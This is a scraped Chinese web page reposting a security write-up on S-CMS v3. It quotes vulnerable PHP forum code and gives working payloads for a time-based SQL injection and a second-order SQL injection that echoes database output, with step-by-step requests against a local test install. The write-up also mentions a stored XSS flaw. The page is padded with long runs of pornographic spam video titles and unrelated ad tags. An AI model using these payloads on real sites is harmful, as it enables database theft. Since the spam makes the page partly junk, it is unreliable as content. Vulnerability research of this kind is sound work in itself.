成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識(shí)庫 > S-CMS企建v3二次SQL注入的方法

S-CMS企建v3二次SQL注入的方法

熱門標(biāo)簽:智能電銷機(jī)器人廣告語 強(qiáng)訊外呼系統(tǒng) 貴陽ai外呼系統(tǒng) crm外呼系統(tǒng)好不好 重慶人工智能電銷機(jī)器人報(bào)價(jià) 電話機(jī)器人批發(fā) 電銷外呼線路改不外呼線路 長春極信防封電銷卡公司 愛巢地圖標(biāo)注

0x01 前言

繼上一篇的S-CMS漏洞再來一波!首發(fā)T00ls

0x2 目錄

Sql注入二次SQL注入

0x03 Sql注入

漏洞文件:\scms\bbs\bbs.php

$action=$_GET["action"];
$S_id=$_GET["S_id"];
if($action=="add"){
$B_title=htmlspecialchars($_POST["B_title"]);
$B_sort=$_POST["B_sort"];
$B_content=htmlspecialchars($_POST["B_content"]);
$S_sh=getrs("select * from SL_bsort where S_id=".intval($B_sort),"S_sh");
if($S_sh==1){
$B_sh=0;
}else{
$B_sh=1;
}
$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('".$B_title."','".$B_content."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$B_sort.",".$B_sh.")");
mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('".$B_title."','".$B_content."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$B_sort.",".$B_sh.")");
$sql="Select * from SL_bbs order by B_id desc limit 1";
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);
 if (mysqli_num_rows($result) > 0) {
 $B_id=$row["B_id"];
 }

相對(duì)來說這個(gè)注入比較簡單,$B_sort 無過濾直接從POST獲取,然而在SELECT查詢的時(shí)候使用了intval函數(shù)來過濾變量。不過后面在insert的時(shí)候卻沒有任何過濾(無單引號(hào)包含)導(dǎo)致sql注入。

漏洞驗(yàn)證:

—Payload:

——http://127.0.0.1/scms/bbs/bbs.php?action=add

——B_title=test&B_content=test11&B_sort=1 and sleep(5)

$debug調(diào)試信息:

Insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('test','test11','2018-12-08 14:21:25',17,1 and sleep(5),0)

0x04 二次注入

漏洞文件:

\scms\bbs\bbs.php

\scms\bbs\item.php

先看一下漏洞觸發(fā)點(diǎn):

$sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;
 $result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);
 if (mysqli_num_rows($result) > 0) {
 $B_title=lang($row["B_title"]);
 $B_content=lang($row["B_content"]);
 $B_time=$row["B_time"];
 $B_sort=$row["B_sort"];
 $S_title=lang($row["S_title"]);
 $B_view=$row["B_view"];
 $M_login=$row["M_login"];
 $M_pic=$row["M_pic"];
 $L_title=$row["L_title"];
 }
if(substr($M_pic,0,4)!="http"){
$M_pic="../media/".$M_pic;
}
$sql2="Select count(*) as B_count from SL_bbs where B_sub=".$id;

$result2 = mysqli_query($conn, $sql2);
$row2 = mysqli_fetch_assoc($result2);
$B_count=$row2["B_count"];
if($action=="reply"){
$B_contentx=$_POST["B_content"];
$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回復(fù)]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回復(fù)]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
box("回復(fù)成功!","item.php?id=".$id,"success");
}

簡單說一下邏輯,第一步執(zhí)行的sql語句是查詢帖子的詳細(xì)內(nèi)容($id帖子id)

$sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;

然后把查詢到的內(nèi)容各自賦給一個(gè)變量

 $B_title=lang($row["B_title"]);
 $B_content=lang($row["B_content"]);
 $B_time=$row["B_time"];
 $B_sort=$row["B_sort"];
..............................

到后面判斷$action=="reply",進(jìn)入回復(fù)帖子功能處

if($action=="reply"){
$B_contentx=$_POST["B_content"];
$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回復(fù)]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回復(fù)]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");
box("回復(fù)成功!","item.php?id=".$id,"success");
}

可以看到$B_contentx=$_POST["B_content"]無過濾,這里會(huì)觸發(fā)儲(chǔ)存xss漏洞。然而這個(gè)不是重點(diǎn),繼續(xù)看執(zhí)行的insert語句,發(fā)現(xiàn)$B_title等變量都拼接了進(jìn)來,沒有sql過濾,而這些變量是從數(shù)據(jù)庫查詢出來的(帖子的標(biāo)題等),然而回過頭去看上面的sql注入,不就是發(fā)帖功能的地方么。所以這些變量可控,導(dǎo)致二次sql注入。

漏洞觸發(fā)流程:

—首先我們?nèi)グl(fā)帖B_title的值是我們的payload,還有其他的值

——B_title=',(select user()),'',1,999,1)%23&B_content=aaaaaaaaaaaa&B_sort=1

—然后我們?nèi)カ@取帖子id,這個(gè)沒有特別好的辦法只能去摸索著找,可以先根據(jù)樓層判斷一共有多少帖子,然后一點(diǎn)一點(diǎn)的往后找,根據(jù)內(nèi)容判斷是否是我們發(fā)布的帖子

——http://127.0.0.1//scms/bbs/item.php?id=帖子id

—獲取到帖子后去觸發(fā)漏洞

——http://127.0.0.1//scms/bbs/item.php?action=reply&id=帖子id

——B_content=test

—這里我說一下payload為什么是這樣的,這樣構(gòu)造完全是為了達(dá)到回顯注入,因?yàn)楹竺娲蛴』貜?fù)內(nèi)容的時(shí)候執(zhí)行的sql注入是

——$sql="select * from SL_bbs where B_sub=".$id." order by B_id asc";

—而B_sub可控(在Insert的時(shí)候插入的),這樣我們就能直接獲取回顯。

漏洞演示:

—Payload1

——127.0.0.1/scms/bbs/bbs.php?action=add

——B_title=',(select user()),'',1,666,1)%23&B_content=hello_admin&B_sort=1

—Payload2

——獲取帖子id

——http://127.0.0.1//scms/bbs/item.php?id=30

—Payload3

——http://127.0.0.1//scms/bbs/item.php?action=reply&id=30

——B_content=test

執(zhí)行完成!最后我們就可以去訪問我們的回復(fù)然后拿到回顯。http://127.0.0.1//scms/bbs/item.php?id=666這次id參數(shù)指向的是我們填的B_sub值

0x05 結(jié)束語

以上就是本文的全部內(nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。

標(biāo)簽:山南 陜西 吳忠 清遠(yuǎn) 上海 廣安 內(nèi)蒙古 保定

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《S-CMS企建v3二次SQL注入的方法》,本文關(guān)鍵詞  S-CMS,企建,二次,SQL,注入,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《S-CMS企建v3二次SQL注入的方法》相關(guān)的同類信息!
  • 本頁收集關(guān)于S-CMS企建v3二次SQL注入的方法的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    韩国欧美一区二区| 久久超碰99| 亚洲色图一区二区三区| abab456成人免费网址| 日韩精品一区二区三区中文字幕| 久久久久久黄| 91一区在线| 国产爆乳无码一区二区麻豆| av日韩在线免费| 香蕉视频网站在线播放| 中文字幕一区二区三区四区在线视频| 尤物在线精品视频| 久久久99爱| 欧美性大战久久久久久久| 日韩中文字幕区一区有砖一区| 宅男视频免费在线观看视频| 国产精品成久久久久三级| 成人xvideos免费视频| 制服丝袜av在线| 影音先锋中文字幕在线视频| 91精品国产亚洲| 久久久国产视频| 亚洲第一综合网站| 色噜噜亚洲精品中文字幕| 亚洲国产精彩视频| a美女胸又www黄视频久久| 九七影院97影院理论片久久| 97在线观视频免费观看| 日韩在线影视| 一级做a爱片久久毛片| 日本亲与子乱a| 视频在线亚洲| 麻豆成全视频免费观看在线看| 激情小说中文字幕| 国产精品秘入口18禁麻豆免会员| 欧美特级特黄aaaaaa在线看| 久久久神马电影| 国产传媒在线播放| 亚洲精品第1页| 国产精品久久久久久久久久99| 无码人妻精品一区二区50| 久久久久久蜜桃| 欧美日韩亚洲一区二区三区| 亚洲石原莉奈一区二区在线观看| 天天插综合网| 久久午夜夜伦鲁鲁片| 日日噜噜噜夜夜爽爽狠狠视频| 一道精品视频一区二区三区男同| 久久这里有精品| 国产精品无码电影在线观看| 黄污网站在线观看| 青青青青草视频| 久久久久久亚洲精品美女| 中文字幕手机在线视频| 国内精品女同女同一区二区三区| 国产欧美日韩视频| 在线精品自拍| 丰满岳乱妇dvd日本| 成视频在线免费观看| 99热在线观看精品| 国产日韩免费| 91精品蜜臀在线一区尤物| 手机在线免费看av| 中国一级免费毛片| 97超碰在线公开在线看免费| 欧美三级中文字| 日韩porn| 日韩午夜视频在线观看| 中文字幕日韩国产| 福利成人在线观看| 97超级碰碰人国产在线观看| 青柠在线影院观看日本| 色老头视频在线观看| 日本天堂影院在线视频| 成人久久电影| 色一区在线观看| 日韩激情啪啪| 日韩女优av电影| 成人手机电影网| 国产91丝袜在线播放九色| 同性视频网站免费男| 亚洲一二三四五| 99精品国产九九国产精品| 福利小视频在线观看| 欧美日韩国产三区| 成人国产精品久久久久久亚洲| 国产日韩欧美电影| 国产精品久久久久影院色老大| 一级片久久久久| 色综合天天视频在线观看| 99这里只有精品视频| 日韩香蕉视频| 久久国产精品久久久久| 欧美哺乳videos| 一区二区视频在线免费观看| 亚洲做受高潮无遮挡| 成人片在线看| 韩日精品视频一区| 91麻豆国产在线观看| 欧美一级午夜免费电影| 国产成人精品久久久| 国产精品秘入口| a国产在线视频| 九九久久久久久| av老司机在线观看| 久久国产精品99精品国产| h视频免费在线| 91视频最新| 国产欧美熟妇另类久久久| 精品国免费一区二区三区| 欧美在线亚洲综合一区| 国产成人精品一区二区三区网站观看| 一区在线观看视频| 午夜男人视频在线观看| 丰满岳乱妇国产精品一区| 久久香蕉精品| 欧美性极品xxxx做受| 懂色av一区二区三区| 秋霞影视一区二区三区| 韩日午夜在线资源一区二区| 精品一区二区久久久久久久网站| 91精品国产美女浴室洗澡无遮挡| 欧美h片在线观看| 15—17女人毛片| 99这里只有久久精品视频| 51vv免费精品视频一区二区| 天天干天天爽天天射| 色综合久久88色综合天天免费| 成人网av.com/| 蜜臀av性久久久久蜜臀aⅴ| www成人免费观看| 国产精品18久久久久久首页狼| 成人在线免费网站| 色香蕉在线视频| √天堂资源在线| 波多野结衣喷潮| 99国内精品久久久久| 久久白虎精品| 久久精品亚洲精品国产欧美kt∨| 日韩欧美视频免费在线观看| 亚洲精品国产熟女久久久| 本网站久久精品| 婷婷另类小说| 蜜桃在线一区二区| 亚洲免费一在线| 欧美另类中文字幕| 黑人巨大亚洲一区二区久| 日本韩国欧美精品大片卡二| 亚洲免费国产视频| 成人国产电影网| 97caopor国产在线视频| 欧美xxxx性xxxxx高清| 在线观看免费黄色| 波多野结衣 在线| 久久精品免费看| 欧美日韩小视频| 日本午夜在线视频| 成年女人毛片| 日本视频在线一区| 视频在线在亚洲| 亚洲电影免费观看高清完整版在线观看| 国模精品一区二区三区色天香| 国产精品一卡| 国产美女在线精品免费观看| 91视频一区二区| 久久国产主播精品| 国产无套内射又大又猛又粗又爽| 特级西西人体高清大胆| 亚洲综合天堂网| 黑人一区二区| 午夜婷婷在线观看| 亚洲影院一区二区三区| 午夜不卡av免费| 四虎海外影库www4hu| 欧美一级一片| 亚洲一区二区三区乱码aⅴ蜜桃女| 345成人影院| 9191在线播放| 潘金莲一级淫片aaaaaa播放1| 成人国产电影在线观看| 国产精品中文字幕一区二区三区| 国产精品丝袜白浆摸在线| 日本电影全部在线观看网站视频| 天天做天天爱天天综合网2021| 夜夜未满十八勿进的爽爽影视| 欧美在线视频免费播放| 久热精品视频在线播放| 极品少妇一区二区三区| 欧美日韩看看2015永久免费| 一本一本久久a久久综合精品蜜桃| 国产精品一区二区免费福利视频| 日本中文在线观看| 精品亚洲夜色av98在线观看| 日韩欧美视频| 午夜羞羞视频| 亚洲第一综合| 日韩欧美亚洲另类| 一起草最新网址| 国产成人精品一区二三区四区五区| 欧美一区二区精品| 亚洲AV成人无码网站天堂久久| 国产精品成人免费在线| 一区二区电影免费观看| 日韩成人三级视频| 国产成人在线观看网站| 亚洲国产精品一区在线观看不卡| 最新电影电视剧在线观看免费观看| 无码人妻精品一区二区三区在线| 微拍福利一区二区| 日韩女同一区二区三区| 少妇高清精品毛片在线视频| 狂野欧美xxxx韩国少妇| 亚洲欧洲一区二区在线播放| 高潮一区二区三区乱码| 国产传媒一区二区三区| www.色多多| 午夜在线观看av| 日本一卡2卡三卡4卡网站| 国产日韩欧美精品一区| 国产国产人免费人成免费视频| 国产精品久久久久久99| 久久精品久久精品| 免费在线观看成人| 日日夜夜天天操| 国产专区第一页| 国产不卡视频在线播放| 操欧美老女人| chien国产乱露脸对白| 国产日韩欧美在线观看视频| 日韩精品一区二区三区视频| 久热精品免费视频| 午夜精品在线看| 久久久蜜桃一区二区| 97超碰最新| 久久精品无码中文字幕| 亚洲久久久久久久久久| 黄色一级大片在线免费看国产| 被黑人猛躁10次高潮视频| 欧美日韩亚洲国产另类| 欧美一区二区三区网站| 亚洲看片免费| 97精品人人妻人人| 一区二区三区加勒比av| av资源一区二区| 国产又粗又猛又色| 亚洲欧美另类图片小说| 日韩你懂的在线观看| 国产免费av一区| 国产超碰在线| caoporen人人| 亚洲精品人成电影网| 成人伊人精品色xxxx视频| 日韩一卡二卡三卡国产欧美| 国产精品天美传媒入口| 日本中文字幕一区二区有限公司| eeuss国产一区二区三区四区| 国产91精品一区二区| 亚洲天堂视频在线| 日韩美女一区二区三区四区| 黄色一级视频片| 国产精品极品国产中出| 91久久精品一区二区三| 久久久久久久久久久网站| 污污网站在线| 美女被内谢流白浆高视频| 91丨九色丨国产丨porny| 日本三日本三级少妇三级66| 欧美无砖专区一中文字| 日韩久久精品一区二区三区| 99av国产精品欲麻豆| 亚洲大尺度视频在线观看| 97人妻精品一区二区免费| 国产欧美一区二区三区四区| 一区二区三区四区中文字幕| 欧美另类精品xxxx孕妇| 久久综合狠狠综合久久激情| 国产午夜精品无码一区二区| 粉嫩高清一区二区三区精品视频| 亚洲精品国产一区二区精华液| 视色,视色影院,视色影库,视色网| 香蕉视频黄色片| www.精品av.com| 国产一级片网站| 国产精品久久久影院| 国产精品探花在线| 一二三四国产精品| 欧美国产亚洲另类动漫| 翁止熄痒禁伦短文合集免费视频| 日韩av网站在线免费观看| 午夜伦理大片视频在线观看| 欧美日韩亚洲综合| 成人av网站免费观看| 免费无码av片在线观看| 国产精品视屏| 欧美另类老肥妇| 1024精品一区二区三区| 欧美一区激情| 538国产精品一区二区免费视频| 精品国产av鲁一鲁一区| 久久国产精品系列| 美女网站色精品尤物极品姐弟| 国产亚洲精品码| 国产一级黄色大片| 国产主播欧美精品| 粉嫩一区二区三区性色av| 成年人小视频网站| 日韩视频一区在线| 欧洲一区在线观看| 国产视频在线观看视频| 国产精品久久久久毛片软件| 久久精品青青大伊人av| 亚洲国产天堂久久国产91| 欧美图片一区二区三区| 玖玖爱免费视频| 日韩美女毛片| 26uuu另类亚洲欧美日本一| 成人情视频高清免费观看电影| 亚洲欧美日韩偷拍| 久久久久久久久久福利| 91亚洲精品久久久蜜桃借种| 国产一区一区三区| 国产精品久久久久久影院8一贰佰| 手机看片日韩av| 国产一区二区av| 三妻四妾完整版在线观看电视剧| 国产欧美日韩一区二区三区四区| 国产日韩欧美视频在线观看| 一区三区三区不卡|